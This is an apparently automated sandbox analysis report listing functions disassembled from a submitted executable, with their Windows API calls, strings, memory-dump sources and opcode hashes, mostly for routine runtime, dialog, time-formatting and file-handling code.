                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                              • String ID: csm$csm$csm
                                                                                              • API String ID: 322700389-393685449
                                                                                              • Opcode ID: 4477ec01d105e3407a1c70e5adebcbe2192b813ef4db4073335a6af7130eada4
                                                                                              • Instruction ID: f2864861be7a7517543f3195c1c0a9d1759fdd0aeec779a4b5e70aabea1ccec7
                                                                                              • Opcode Fuzzy Hash: 4477ec01d105e3407a1c70e5adebcbe2192b813ef4db4073335a6af7130eada4
                                                                                              • Instruction Fuzzy Hash: ADB1AE7980020AEFCF24DFA4C981AAEBBB5FF98310F14415AF8116B212D775EA51CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3A6D1 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00A3A6F6
                                                                                              • _wcslen.LIBCMT ref: 00A3A796
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00A3A7A5
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00A3A7C6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                              • API String ID: 1116704506-4209811716
                                                                                              • Opcode ID: da355092e6e1ecd8625f0d6315d1da1cd5e0dd5f63935fa42679e3db3d1d0586
                                                                                              • Instruction ID: 754c65731e427434178689ef4355fd8c84b4f2b00b2015ddc62441ed4902f4c4
                                                                                              • Opcode Fuzzy Hash: da355092e6e1ecd8625f0d6315d1da1cd5e0dd5f63935fa42679e3db3d1d0586
                                                                                              • Instruction Fuzzy Hash: A23186321043617EE315AB709C86FAFB7A8FFA1320F14011EF841961D1EFA4D90982A6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3C7B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A212F6: GetDlgItem.USER32(00000000,00003021), ref: 00A2133A
                                                                                                • Part of subcall function 00A212F6: SetWindowTextW.USER32(00000000,00A545F4), ref: 00A21350
                                                                                              • EndDialog.USER32(?,00000001), ref: 00A3C800
                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00A3C827
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00A3C840
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00A3C851
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 00A3C85A
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00A3C86E
                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00A3C884
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                              • String ID: LICENSEDLG
                                                                                              • API String ID: 3214253823-2177901306
                                                                                              • Opcode ID: d2a9809db40619f56b5ca4105b2e2ab35832995b8504aa9cee173c4e661ea58a
                                                                                              • Instruction ID: 143384b9ad5dce4138b928793681af9e2be5902be28239685d8566eae7527b0e
                                                                                              • Opcode Fuzzy Hash: d2a9809db40619f56b5ca4105b2e2ab35832995b8504aa9cee173c4e661ea58a
                                                                                              • Instruction Fuzzy Hash: 9821A372A502107BD611EFB9EC8DF7B3B7CEB46B55F004515FA40B60A0CB6299039771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2B5D6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00A2B5E2
                                                                                                • Part of subcall function 00A32701: GetSystemTime.KERNEL32(?), ref: 00A3270F
                                                                                                • Part of subcall function 00A32701: SystemTimeToFileTime.KERNEL32(?,?), ref: 00A3271D
                                                                                                • Part of subcall function 00A326AA: __aulldiv.LIBCMT ref: 00A326B3
                                                                                              • __aulldiv.LIBCMT ref: 00A2B60E
                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 00A2B615
                                                                                              • _swprintf.LIBCMT ref: 00A2B640
                                                                                                • Part of subcall function 00A24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A24A33
                                                                                              • _wcslen.LIBCMT ref: 00A2B64A
                                                                                              • _swprintf.LIBCMT ref: 00A2B6A0
                                                                                              • _wcslen.LIBCMT ref: 00A2B6AA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
                                                                                              • String ID: %u.%03u
                                                                                              • API String ID: 2956649372-1114938957
                                                                                              • Opcode ID: 08998c02c240a6e591bcf33a09d252ef42ab2367d716b6a9c0595b084d3f74fc
                                                                                              • Instruction ID: 4debbf11cb861d7ae33af7f8b25549ac25f5eaa192268f7dca2b530dabde817f
                                                                                              • Opcode Fuzzy Hash: 08998c02c240a6e591bcf33a09d252ef42ab2367d716b6a9c0595b084d3f74fc
                                                                                              • Instruction Fuzzy Hash: 152183B2A18310AFD614EF69DD86E9B77ECEBD8750F00492AF545E3241DB34DA0887B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3BC2B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A3BC3F
                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00A3BC50
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A3BC5E
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A3BC6C
                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00A3BC87
                                                                                              • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 00A3BCAE
                                                                                              • _swprintf.LIBCMT ref: 00A3BCD4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$System$File$Format$DateLocalSpecific_swprintf
                                                                                              • String ID: %s %s
                                                                                              • API String ID: 385609497-2939940506
                                                                                              • Opcode ID: c8ebacf9b620c6863e2c0a2c87d27e828d05332bc6a278f7235aa04716247e19
                                                                                              • Instruction ID: 9cae5042061687b64b2539557ede5a4f02ae003e2a396c20aca64ac227ebd6c5
                                                                                              • Opcode Fuzzy Hash: c8ebacf9b620c6863e2c0a2c87d27e828d05332bc6a278f7235aa04716247e19
                                                                                              • Instruction Fuzzy Hash: 2221C7B254115CABDB21DFA0EC45EEF3BADFF19345F140526FA09D2111E720DA89CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A40ED0 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00A2C43F,00A2C441,00000000,00000000,97CBF2BB,00000001,00000000,00000000,00A2C32C,?,?,?,00A2C43F,ROOT\CIMV2), ref: 00A40F59
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00A2C43F,?,00000000,00000000,?,?,?,?,?,00A2C43F), ref: 00A40FD4
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00A40FDF
                                                                                              • _com_issue_error.COMSUPP ref: 00A41008
                                                                                              • _com_issue_error.COMSUPP ref: 00A41012
                                                                                              • GetLastError.KERNEL32(80070057,97CBF2BB,00000001,00000000,00000000,00A2C32C,?,?,?,00A2C43F,ROOT\CIMV2), ref: 00A41017
                                                                                              • _com_issue_error.COMSUPP ref: 00A4102A
                                                                                              • GetLastError.KERNEL32(00000000,?,00A2C43F,ROOT\CIMV2), ref: 00A41040
                                                                                              • _com_issue_error.COMSUPP ref: 00A41053
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                              • String ID:
                                                                                              • API String ID: 1353541977-0
                                                                                              • Opcode ID: 8a263e58b2d381941164406b9c71103992f54628dad63300c359067d391aa88b
                                                                                              • Instruction ID: 982075656160dfe7aaa09e275d7d91fdc74c331885181f07540b8665342abfc4
                                                                                              • Opcode Fuzzy Hash: 8a263e58b2d381941164406b9c71103992f54628dad63300c359067d391aa88b
                                                                                              • Instruction Fuzzy Hash: 7D41F879A00315ABDB10DFA4DD45FAEBBB8FF88711F10422AF905E7280D775A88487A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2C3F7 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                              • API String ID: 3519838083-3505469590
                                                                                              • Opcode ID: 230dfb2736128c073b949b7db63544747cc2613cb832db76b994211ac285ae38
                                                                                              • Instruction ID: f3aab062afcdb34215ff6a043f979e8a3b27ea65fe677c94589e9b2b3a3fcb05
                                                                                              • Opcode Fuzzy Hash: 230dfb2736128c073b949b7db63544747cc2613cb832db76b994211ac285ae38
                                                                                              • Instruction Fuzzy Hash: D1713F71A00229AFDB14DFA8DC959BFB7B9FF48725B140569F506E72A0CB30AD42CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2A5E9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A2A5EE
                                                                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00A2A611
                                                                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00A2A630
                                                                                                • Part of subcall function 00A2D6A7: _wcslen.LIBCMT ref: 00A2D6AF
                                                                                                • Part of subcall function 00A33316: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013316,00A2D523,00000000,.exe,?,?,00000800,?,?,?,00A39E5C), ref: 00A3332C
                                                                                              • _swprintf.LIBCMT ref: 00A2A6CC
                                                                                                • Part of subcall function 00A24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A24A33
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00A2A73B
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00A2A77B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                              • String ID: rtmp%d
                                                                                              • API String ID: 3726343395-3303766350
                                                                                              • Opcode ID: 803b9c6ec0496532256ca9133fb3c38ef424ed138ecdbb6bc63f5682e34befc6
                                                                                              • Instruction ID: 2c4545aa105b7c4683bcd5eee37923f860e13c88f76dcbf8dee8aba048c916a5
                                                                                              • Opcode Fuzzy Hash: 803b9c6ec0496532256ca9133fb3c38ef424ed138ecdbb6bc63f5682e34befc6
                                                                                              • Instruction Fuzzy Hash: 4F415B729102396BCF20ABA8ED84EEF737CBF64340F0404B5B545E3046EB348A859F65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A32538 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __aulldiv.LIBCMT ref: 00A3254E
                                                                                                • Part of subcall function 00A2C619: GetVersionExW.KERNEL32(?), ref: 00A2C63E
                                                                                              • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,00000001), ref: 00A32571
                                                                                              • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,00000001), ref: 00A32583
                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00A32594
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A325A4
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A325B4
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00A325EF
                                                                                              • __aullrem.LIBCMT ref: 00A32699
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                              • String ID:
                                                                                              • API String ID: 1247370737-0
                                                                                              • Opcode ID: c10d744862f642fdb4aac9d34dbce341c1b9aa3e28bd5a42c3d556b932620b05
                                                                                              • Instruction ID: a7b4c9b5e42422a2ead6294b63c79d681374b9db48bb09519694898799664673
                                                                                              • Opcode Fuzzy Hash: c10d744862f642fdb4aac9d34dbce341c1b9aa3e28bd5a42c3d556b932620b05
                                                                                              • Instruction Fuzzy Hash: 72411AB25483059FC714DF65D884A6BBBF9FF88315F008A2EF59AC2210E734E549CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3AD1E Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: </p>$</style>$<br>$<style>$>
                                                                                              • API String ID: 176396367-3568243669
                                                                                              • Opcode ID: 77688068a4b0f97e87d45cc52ac2db09c0140374ca22a8f4772c3beda7f82dd5
                                                                                              • Instruction ID: 50fed01cec0cad3b5314b32f9fb47c0be67209224143525f32528b30d31dc9ac
                                                                                              • Opcode Fuzzy Hash: 77688068a4b0f97e87d45cc52ac2db09c0140374ca22a8f4772c3beda7f82dd5
                                                                                              • Instruction Fuzzy Hash: CD51E56674037395DB305B249822B7673E0EFB4792F68482BFDC19B5C0FB658D818262
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A5084D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00A50FC2,00000000,00000000,00000000,00000000,00000000,?), ref: 00A5088F
                                                                                              • __fassign.LIBCMT ref: 00A5090A
                                                                                              • __fassign.LIBCMT ref: 00A50925
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00A5094B
                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,00A50FC2,00000000,?,?,?,?,?,?,?,?,?,00A50FC2,00000000), ref: 00A5096A
                                                                                              • WriteFile.KERNEL32(?,00000000,00000001,00A50FC2,00000000,?,?,?,?,?,?,?,?,?,00A50FC2,00000000), ref: 00A509A3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1324828854-0
                                                                                              • Opcode ID: 84f1d5b41765b1871ec68ce6c161a454380adfed3c1c1f538c3c7303ecc6575b
                                                                                              • Instruction ID: 7d26853d382aa82a813cc56c50b8270d9ffee377603f6ce547e36ae91485c66e
                                                                                              • Opcode Fuzzy Hash: 84f1d5b41765b1871ec68ce6c161a454380adfed3c1c1f538c3c7303ecc6575b
                                                                                              • Instruction Fuzzy Hash: 9C517E71A00249AFDB10CFA8D885EEEBBB8FF49311F14415AE955E7292E7309945CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A43A90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00A43AC7
                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00A43ACF
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00A43B58
                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00A43B83
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00A43BD8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                              • String ID: csm
                                                                                              • API String ID: 1170836740-1018135373
                                                                                              • Opcode ID: 7ba8f9a6711d1900c242b86cd72b74ca73f9dac542ede16494a2d0c0ddab54ef
                                                                                              • Instruction ID: 36c5bc185985f31d66c4f8b0a70a692e4cc4e4ba0f52d1167bd87ae584bfea7e
                                                                                              • Opcode Fuzzy Hash: 7ba8f9a6711d1900c242b86cd72b74ca73f9dac542ede16494a2d0c0ddab54ef
                                                                                              • Instruction Fuzzy Hash: B441D379A01218AFCF10DF69C885B9EBBB4FF85324F148165E8149B392C771AB06CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3AEF5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00A3AF0E
                                                                                              • GetWindowRect.USER32(?,?), ref: 00A3AF64
                                                                                              • ShowWindow.USER32(?,00000005,00000000), ref: 00A3B001
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00A3B009
                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00A3B01F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
